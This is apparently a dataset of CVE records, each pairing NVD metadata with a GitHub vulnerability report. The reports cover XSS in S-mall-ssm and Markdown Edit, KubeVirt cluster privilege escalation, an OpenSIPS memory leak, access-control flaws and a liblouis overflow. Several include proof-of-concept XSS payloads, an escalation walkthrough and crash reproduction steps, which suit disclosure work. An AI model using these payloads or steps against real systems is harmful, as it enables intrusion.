# How to reproduce steps(ๅฆ‚ไฝ•ๅค็Žฐ) Build the project and use admin/123456 to log in and create several test data(ๆญๅปบ้กน็›ฎไฝฟ็”จadmin/123456็™ป้™†ๅˆ›ๅปบๅ‡ ๆกๆต‹่ฏ•ๆ•ฐๆฎ) <img width="945" alt="image" src="https://user-images.githubusercontent.com/71024364/218407105-6ba3e7b6-9e24-48d5-b2ad-a19a7e3c9fd9.png"> Create an ordinary user and click on a product we created to buy(ๅˆ›ๅปบไธ€ไธชๆ™ฎ้€š็”จๆˆท้šไพฟ็‚นๅ‡ปไธ€ไธชๆˆ‘ไปฌๅˆ›ๅปบ็š„ๅ•†ๅ“่ดญไนฐ) For the convenience of testing, a free purchase function is provided. Click it(ไธบไบ†ๆ–นไพฟๆต‹่ฏ•ๆไพ›ไบ†ไธ€ไธชๅ…่ดน่ดญไนฐ็š„ๅŠŸ่ƒฝ,) <img width="609" alt="image" src="https://user-images.githubusercontent.com/71024364/218407909-36c52327-74e8-477f-a372-e3d0c4a71c64.png"> First, check my own order, then select the order we just purchased, click to ship by yourself, and finally click to confirm receipt(้ฆ–ๅ…ˆๆŸฅ็œ‹ๆˆ‘่‡ชๅทฑ็š„่ฎขๅ•ๅ…ถๆฌก้€‰ๆ‹ฉๆˆ‘ไปฌๅˆšๆ‰่ดญไนฐ็š„่ฎขๅ•็‚นๅ‡ป่‡ชๅทฑๅ‘่ดงๆœ€ๅŽ็‚นๅ‡ป็กฎ่ฎคๆ”ถ่ดง) <img width="1247" alt="image" src="https://user-images.githubusercontent.com/71024364/218408515-4604b3f5-98ce-49fe-a074-c81791007ba1.png"> Use the evaluation function,insert poc `<script>alert("undefined123")</script>` (ไฝฟ็”จ่ฏ„ไปทๅŠŸ่ƒฝ,ๆ’ๅ…ฅpoc) <img width="610" alt="image" src="https://user-images.githubusercontent.com/71024364/218408931-9d389625-b8c7-487a-a8ea-67c43723a473.png"> # ๅ—ๅฝฑๅ“็š„็‰ˆๆœฌ S-mall-ssm: lastest OS๏ผšWindows/Linux/macOS Browser: Chromeใ€Firefoxใ€Safair
Stored xss vulnerability exists in order evaluation(่ฎขๅ•่ฏ„ไปทๅญ˜ๅœจXSSๆผๆดž)
https://api.github.com/repos/xenv/S-mall-ssm/issues/37/comments
0
2023-02-13T08:43:33Z
2023-02-13T08:43:33Z
https://github.com/xenv/S-mall-ssm/issues/37
1,581,902,665
37
4,843
CVE-2023-26484
2023-03-15T21:15:08.857
KubeVirt is a virtual machine management add-on for Kubernetes. In versions 0.59.0 and prior, if a malicious user has taken over a Kubernetes node where virt-handler (the KubeVirt node-daemon) is running, the virt-handler service account can be used to modify all node specs. This can be misused to lure-in system-level-privileged components which can, for instance, read all secrets on the cluster, or can exec into pods on other nodes. This way, a compromised node can be used to elevate privileges beyond the node until potentially having full privileged access to the whole cluster. The simplest way to exploit this, once a user could compromise a specific node, is to set with the virt-handler service account all other nodes to unschedulable and simply wait until system-critical components with high privileges appear on its node. No patches are available as of time of publication. As a workaround, gatekeeper users can add a webhook which will block the `virt-handler` service account to modify the spec of a node.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.8, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.8, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubevirt/kubevirt/issues/9109" }, { "source": "security-advisories@github.com", "tags": [ "Mitigation", "Vendor Advisory" ], "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-cp96-jpmq-xrr2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubevirt/kubevirt/issues/9109" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mitigation", "Vendor Advisory" ], "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-cp96-jpmq-xrr2" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", "matchCriteriaId": "B0C470F6-1D95-437E-9A57-D0075ED16482", "versionEndExcluding": null, "versionEndIncluding": "0.59.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "863" ]
863
https://github.com/kubevirt/kubevirt/issues/9109
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kubevirt", "kubevirt" ]
Description: * There are three components of kubevirt with default installation: kubevirt-handler, kubevirt-controller, kubevirt-api, and kubevirt-operator, the kubevirt-handler is a daemon set running on each node, the controller&api&operator are deployments, each of them is two-pod deployments running on worker nodes randomly. * There are different cluster roles of these components: * The cluster role of the kubevirt-handler can patch nodes, which can be leveraged to make nodes unschedulable. * The cluster role of the kubevirt-controller can create pods/eviction, which can be leveraged to make pods evicted. While the cluster role of kubevirt-api can delete pods, which can be leveraged to make pods recreated and rescheduled to worker nodes. * The cluster role of the kubevirt-operator can list all secrets, which can be leveraged to get the admin secret of the entire cluster and make cluster-level privilege escalation. * If a malicious user controls a worker node, which has kubevirt-handler, and one of kubevirt-api/controller: 1. He/she can leverage the kubevirt-handler to path all other nodes with unschedulable: true". And when the kubevirt-operator is rescheduled, the kubevirt-operator will be rescheduled to the malicious worker node. 2. He/She can use the token of kubevirt-api/controller to evict/delete kubevirt-operator pods, which will be recreated and run on the malicious worker node. 3. After the kubevirt-operator runs on the malicious worker node, he/she can leverage the operator's token to list all secrets in the whole cluster, get the cluster admin's token and make a cluster-level privilege escalation. * Mitigation Discussion: * The cluster role of the kubevirt-operator can use the Resource Names to restrain the secrets which can be listed by the operator itself, however, it may need a careful review of the kubevirt-operator to identify all secrets needed by the operator exactly. * The kubevirt-handler can remove the patch verbs of nodes, and the controller/api can remove the evict and delete of pods. However, similar to the first mitigation, it still needs a careful revisit of the components' source code. * The kubevirt can let the kubevirt-operator/controller/api runs on worker nodes (which we called "controller worker node") without running users' workloads, and leverage the isolation of nodes to mitigate the risk. However, if a malicious user leverages some method(i.e., scale-up of kubevirt-handler) and moves to the "controller worker node" horizontally, it still can break the worker nodes' isolation and make privilege escalation. * Installation and environment: * We follow the Kubevirt's [official guide](https://kubevirt.io/user-guide/operations/installation/) to install the Kubevirt on a four-node Kubernetes cluster(1.24.2). I'm looking forward to hearing back from you!
A potential risk of kubevirt makes a worker node get the cluster's admin secret.
https://api.github.com/repos/kubevirt/kubevirt/issues/9109/comments
60
2023-01-27T04:27:44Z
2025-03-10T12:52:37Z
https://github.com/kubevirt/kubevirt/issues/9109
1,559,151,655
9,109
4,844
CVE-2023-28099
2023-03-15T23:15:09.807
OpenSIPS is a Session Initiation Protocol (SIP) server implementation. Prior to versions 3.1.9 and 3.2.6, if `ds_is_in_list()` is used with an invalid IP address string (`NULL` is illegal input), OpenSIPS will attempt to print a string from a random address (stack garbage), which could lead to a crash. All users of `ds_is_in_list()` without the `$si` variable as 1st parameter could be affected by this vulnerability to a larger, lesser or no extent at all, depending if the data passed to the function is a valid IPv4 or IPv6 address string or not. Fixes will are available starting with the 3.1.9 and 3.2.6 minor releases. There are no known workarounds.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 3.6, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OpenSIPS/opensips/commit/e2f13d374" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OpenSIPS/opensips/issues/2780" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OpenSIPS/opensips/security/advisories/GHSA-pfm5-6vhv-3ff3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/OpenSIPS/opensips/commit/e2f13d374" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OpenSIPS/opensips/issues/2780" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/OpenSIPS/opensips/security/advisories/GHSA-pfm5-6vhv-3ff3" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensips:opensips:*:*:*:*:*:*:*:*", "matchCriteriaId": "F318FB66-A6E9-4A16-996B-DD76A8C64A6E", "versionEndExcluding": "3.1.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:opensips:opensips:*:*:*:*:*:*:*:*", "matchCriteriaId": "3C466525-94B6-4196-9CEA-CD72452FE22D", "versionEndExcluding": "3.2.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "3.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "20" ]
20
https://github.com/OpenSIPS/opensips/issues/2780
[ "Third Party Advisory" ]
github.com
[ "OpenSIPS", "opensips" ]
Sorry to issue this publicly, but when I mailed to security@opensips.org, googlemail told me that "Your message wasn't delivered to [security@opensips.org]() because the address couldn't be found" ## Detail In `ds_is_in_list`, the first variable `val` has no initialization before https://github.com/OpenSIPS/opensips/blob/master/modules/dispatcher/dispatch.c#L2327 ,and if variable `ip` is not valid(str2ip(ip)==NULL && str2ip6(ip==NULL)), the function will access `val.rs.len, val.rs.s` by `LM_ERR`. For that reason, in some cases/samples, users are allowed to use "ds_is_in_list" cmd, then an attacker may be able to pollute the stack before calling `ds_is_in_list` in order to control the uninitialized `val.rs.s` to arbitrary memory address and `val.rs.len` to arbitrary integer, resulting in content of arbitrary memory address to be logged (such as passwords/cookies/sessions/....). ``` /* Checks, if the request (sip_msg *_m) comes from a host in a set * (set-id or -1 for all sets) */ int ds_is_in_list(struct sip_msg *_m, str *_ip, int port, int set, ds_partition_t *partition, int active_only, str *pattern_s) { pv_value_t val; ds_set_p list; struct ip_addr *ip; int_str avp_val; int j,k; char *pattern = NULL; if (!(ip = str2ip(_ip)) && !(ip = str2ip6(_ip))) { LM_ERR("IP val is not IP <%.*s>\n",val.rs.len,val.rs.s); return -1; } if (pattern_s) { pattern = pkg_malloc(pattern_s->len + 1); if (!pattern) { LM_ERR("oom for pattern!\n"); return -1; } memcpy(pattern, pattern_s->s, pattern_s->len); pattern[pattern_s->len] = '\0'; } memset(&val, 0, sizeof(pv_value_t)); val.flags = PV_VAL_INT|PV_TYPE_INT; /* access ds data under reader's lock */ .... ``` ## Suggestion Initialize `val` before accessing `val.rs`
[Vuln] Potential arbitrary-memory-log in ds_is_in_list due to uninit varaible on stack
https://api.github.com/repos/OpenSIPS/opensips/issues/2780/comments
9
2022-03-16T08:56:26Z
2023-03-15T15:03:37Z
https://github.com/OpenSIPS/opensips/issues/2780
1,170,721,726
2,780
4,845
CVE-2023-27084
2023-03-16T02:15:08.550
Permissions vulnerability found in isoftforce Dreamer CMS v.4.0.1 allows local attackers to obtain sensitive information via the AttachmentController parameter.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 1, "impactScore": 4.2, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://gitee.com/isoftforce/dreamer_cms/issues/I6GCUN" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/iteachyou-wjn/dreamer_cms/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://gitee.com/isoftforce/dreamer_cms/issues/I6GCUN" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/iteachyou-wjn/dreamer_cms/issues/9" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dreamer_cms_project:dreamer_cms:4.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "E70A0945-89A5-4E5D-B7D2-A1BF9031A966", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/iteachyou-wjn/dreamer_cms/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "iteachyou-wjn", "dreamer_cms" ]
Hello, I'm Li Jiakun, a security researcher Affected version: 4.0.0 Any user can access the port without verifying the current user information ![image](https://user-images.githubusercontent.com/110451039/223903255-a87c4cdc-b567-48b8-9211-095d3823d735.png) Background applications do not control permissions, or only control permissions on menus and buttons. As a result, malicious users can access or control data or pages owned by other roles by guessing the urls or sensitive parameter information of other management pages, achieving the purpose of enhancing permissions.
Dreamer CMS overreach loophole
https://api.github.com/repos/iteachyou-wjn/dreamer_cms/issues/9/comments
1
2023-03-09T02:49:41Z
2023-04-11T06:48:36Z
https://github.com/iteachyou-wjn/dreamer_cms/issues/9
1,616,304,919
9
4,846
CVE-2023-27095
2023-03-16T02:15:08.603
Insecure Permissions vulnerability found in OpenGoofy Hippo4j v.1.4.3 allows attacker toescalate privileges via the AddUser method of the UserController function in Tenant Management module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opengoofy/hippo4j/issues/1061" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/opengoofy/hippo4j/issues/1061" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opengoofy:hippo4j:*:*:*:*:*:*:*:*", "matchCriteriaId": "ACB74483-2C0C-4789-B9DD-9CC387B18AAD", "versionEndExcluding": "1.4.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "732" ]
732
https://github.com/opengoofy/hippo4j/issues/1061
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "opengoofy", "hippo4j" ]
ConfigVerifyController for the Tenant Management module of hippo4j. There are information leakage vulnerabilities, unauthorized access vulnerabilities in authority promotion, The vulnerability is the result of check the thread pool modificationApplicationPage method does not to perform the current operation user identity and in the same Controller layer verifyConfigModification method to perform the current operation of the user for authentication , leading to any user can access/hippo4j/v1 / cs/configs/verify/query/application/page interface to retrieve information forms through the access/hippo4j/v1 / cs/configs/verify interface to modify the thread pool audit status Influence version hippo4j 1.4.3 (Nov 06, 2022) ![image](https://user-images.githubusercontent.com/110451039/220060182-b18253cc-b39f-45dc-923c-44dfa5bf9d46.png)
[Bug] Hippo4j monitors system information leakage
https://api.github.com/repos/opengoofy/hippo4j/issues/1061/comments
0
2023-02-20T09:02:03Z
2023-09-01T08:27:39Z
https://github.com/opengoofy/hippo4j/issues/1061
1,591,424,922
1,061
4,847
CVE-2020-19947
2023-03-16T15:15:09.910
Cross Site Scripting vulnerability found in Markdown Edit allows a remote attacker to execute arbitrary code via the edit parameter of the webpage.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/georgeOsdDev/markdown-edit/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/georgeOsdDev/markdown-edit/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:markdown_edit_project:markdown_edit:-:*:*:*:*:*:*:*", "matchCriteriaId": "F7AFF34E-C350-4B5B-8757-6026239C08BF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/georgeOsdDev/markdown-edit/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "georgeOsdDev", "markdown-edit" ]
This label and attack vector will cause dom-based XSS. if you type ``` <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> ``` ![xss](https://user-images.githubusercontent.com/22830917/62454463-f5ee4c80-b7a6-11e9-9caf-6a2670ae973d.PNG) the XSS vulnerability will be triggered.
dom-based XSS
https://api.github.com/repos/georgeOsdDev/markdown-edit/issues/12/comments
1
2019-08-05T09:37:43Z
2019-08-06T08:13:42Z
https://github.com/georgeOsdDev/markdown-edit/issues/12
476,756,369
12
4,848
CVE-2023-26767
2023-03-16T15:15:10.233
Buffer Overflow vulnerability found in Liblouis v.3.24.0 allows a remote attacker to cause a denial of service via the lou_logFile function at logginc.c endpoint.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/liblouis/liblouis/issues/1292" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/liblouis/liblouis/pull/1297" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/liblouis/liblouis/issues/1292" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch" ], "url": "https://github.com/liblouis/liblouis/pull/1297" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:liblouis:liblouis:3.24.0:*:*:*:*:*:*:*", "matchCriteriaId": "6125AA43-2A33-4526-B355-32D42F306CD3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/liblouis/liblouis/issues/1292
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "liblouis", "liblouis" ]
When long path is given to API `lou_setDataPath()`, there will be a global-buffer-overflow. Similar to #1291, because liblouis does not check the input length. https://github.com/liblouis/liblouis/blob/63722f0428cd4e98d7446658162fb71732d892bb/liblouis/compileTranslationTable.c#L58-L62 ## Test Environment Ubuntu 16.04.3 LTS liblouis (master, 6223f21) ## How to trigger 1. Compile liblouis with AddressSanitizer 2. Compile the [fuzz driver](https://raw.githubusercontent.com/Marsman1996/pocs/master/liblouis/driver-API-6223f21-lou_setDataPath-BO.c) and [poc file](https://raw.githubusercontent.com/Marsman1996/pocs/master/liblouis/poc-API-6223f21-lou_setDataPath-BO) 3. Compile the fuzz driver: `$ clang -g -fsanitize=address,fuzzer ./driver-API-6223f21-lou_setDataPath-BO.c ./bin_asan/lib/liblouis.a -I ./bin_asan/include/liblouis/ -o driver-API-6223f21-lou_setDataPath-BO` 4. run the compiled driver: `$ ./driver-API-6223f21-lou_setDataPath-BO poc-API-6223f21-lou_setDataPath-BO` ## ASAN report ``` $ ./driver-API-6223f21-lou_setDataPath-BO poc-API-6223f21-lou_setDataPath-BO Minimum size is 0 INFO: Running with entropic power schedule (0xFF, 100). INFO: Seed: 1537783897 INFO: Loaded 1 modules (2848 inline 8-bit counters): 2848 [0x80bf40, 0x80ca60), INFO: Loaded 1 PC tables (2848 PCs): 2848 [0x5b9668,0x5c4868), ./driver-API-6223f21-lou_setDataPath-BO: Running 1 inputs 1 time(s) each. Running: poc-API-6223f21-lou_setDataPath-BO ================================================================= ==29969==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000010e85a0 at pc 0x00000050dc38 bp 0x7ffed6135f90 sp 0x7ffed6135750 WRITE of size 4098 at 0x0000010e85a0 thread T0 #0 0x50dc37 in strcpy /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:423:5 #1 0x553af6 in lou_setDataPath /opt/disk/marsman/liblouis/6223f21/build_asan/liblouis/../../code/liblouis/compileTranslationTable.c:62:2 #2 0x553674 in AFG_func /opt/disk/marsman/liblouis/6223f21/./driver-API-6223f21-lou_setDataPath-BO.c:16:2 #3 0x553890 in LLVMFuzzerTestOneInput /opt/disk/marsman/liblouis/6223f21/./driver-API-6223f21-lou_setDataPath-BO.c:43:2 #4 0x459951 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerLoop.cpp:599:15 #5 0x443612 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:323:6 #6 0x449980 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerDriver.cpp:856:9 #7 0x473902 in main /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/fuzzer/FuzzerMain.cpp:20:10 #8 0x7fdb3926383f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #9 0x41e118 in _start (/opt/disk/marsman/liblouis/6223f21/driver-API-6223f21-lou_setDataPath-BO+0x41e118) 0x0000010e85a0 is located 0 bytes to the right of global variable 'dataPath' defined in '../../code/liblouis/compileTranslationTable.c:59:14' (0x10e7da0) of size 2048 SUMMARY: AddressSanitizer: global-buffer-overflow /local/mnt/workspace/bcain_clang_vm-bcain-aus_3184/final/llvm-project/compiler-rt/lib/asan/asan_interceptors.cpp:423:5 in strcpy Shadow bytes around the buggy address: 0x000080215060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080215070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080215080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080215090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000802150a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0000802150b0: 00 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802150c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802150d0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802150e0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000802150f0: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9 0x000080215100: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==29969==ABORTING ```
global-buffer-overflow in lou_setDataPath() when long path is given
